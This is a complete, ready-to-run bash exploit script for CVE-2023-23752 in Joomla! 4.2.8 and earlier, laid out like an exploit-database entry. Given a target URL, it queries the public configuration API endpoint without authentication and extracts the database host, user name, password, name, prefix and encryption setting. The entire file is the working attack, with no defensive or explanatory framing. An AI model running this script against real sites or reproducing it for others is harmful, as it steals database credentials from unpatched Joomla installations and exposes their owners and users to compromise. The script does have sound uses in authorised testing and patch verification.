#!/bin/bash
# Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure
# Date: 2024-05-21
# CVE: CVE-2023-23752
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.joomla.org
# Software Link: https://downloads.joomla.org
# Version: <= 4.2.8
# Tested on: Linux
# Category: Web Application
while getopts ":u:" arg; do
  case ${arg} in
    u) url=${OPTARG}; let parameter_counter+=1 ;;
  esac
done
if [ -z "${url}" ]; then
  echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
  echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n"
  exit 1
else
  echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
  curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp
  echo -e "\n[i] Database info:\n"
  echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)"
  echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)"
  echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m"
  echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m"
  echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)"
  echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)"
  echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n"
  exit 0
fi